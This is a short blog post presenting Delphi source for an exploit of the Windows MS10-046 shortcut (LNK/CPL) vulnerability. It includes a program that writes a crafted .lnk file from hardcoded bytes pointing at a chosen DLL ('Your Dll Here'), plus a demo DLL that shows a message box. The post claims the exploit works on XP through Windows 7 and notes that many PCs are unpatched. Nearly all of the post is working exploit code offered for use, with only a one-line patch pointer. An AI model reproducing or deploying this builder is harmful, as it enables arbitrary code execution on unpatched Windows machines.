[MS10-046] Cpl Lnk Exploit - Lnk Vulnerability by Paray_Vx

posted 9 Dec 2010, 15:16 by Delphi Basics
This code details the MS10-046 'CPL Lnk Exploit' in Delphi.

Cpl Lnk Vulnerability - MS10-046 in Delphi
Author: - Paray_Vx -
Tested and Working on Windows Xp, Windows Vista and Windows 7

program MS10046;
uses
  SysUtils,
  Windows;

procedure CplLnkExploit(location:string);
const
  // ShellCode Lnk Vulnerability
  Sizelnk :integer = 141;
  ShellCode  : ARRAY [1..141] OF Byte = (
$4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00,$46,$81,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$01,
$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$00,$36,$01,$14,$00,$1F,$50,$E0,$4F,$D0,$20,$EA,$3A,$69,$10,$A2,$D8,$08,$00,$2B,$30,$30,$9D,$14,$00,$2E,$1E,$20,$20,$EC,$21,$EA,$3A,$69,$10,$A2,$DD,$08,$00,$2B,$30,$30,$9D,$0C,$01,$00,$00,$00,
$00,$00,$00,$00,$00,$00,$00,$00,$6A,$00,$00,$00,$00,$00,$00,$20,$00,$3A);

// ~ Your Dll Here ~ Ex : 'C:\MS10046.dll'
  SizeNameDll : integer = 28;
  Dllx : ARRAY [1..28] OF Byte = ($00,$43,$00,$3A,$00,$5C,$00,$4D,$00,$53,$00,$31,$00,$30,$00,$30,$00,$34,$00,$36,$00,$2E,$00,$64,$00,$6C,$00,$6C);

var
 one : file;
 i : integer;

begin
 AssignFile(one,location);
 Rewrite(one,1);

  for i:=1 to Sizelnk do
  begin
   BlockWrite(one,ShellCode[i],1);
  end;

  for i:=1 to SizeNameDll do
  begin
   BlockWrite(one,Dllx[i],1);
  end;

  CloseFile(one);
end;

begin
     MessageBoxA(0,'CPL Lnk Exploit Built!', 'MS10-046', MB_OK);
     // Extract here
     CplLnkExploit('C:\MS10-046.lnk');
end.

Library MS10046;

uses
  Windows;

begin
     MessageBoxA(0, 'CPL Lnk Exploit Success!', 'MS10-046', MB_ICONWARNING);
end.

Many PCs are unpatched and vulnerable to this exploit. To protect yourself, patch your OS here:

Read more about CPL Lnk Vulnerability (MS10-04) here :
Comments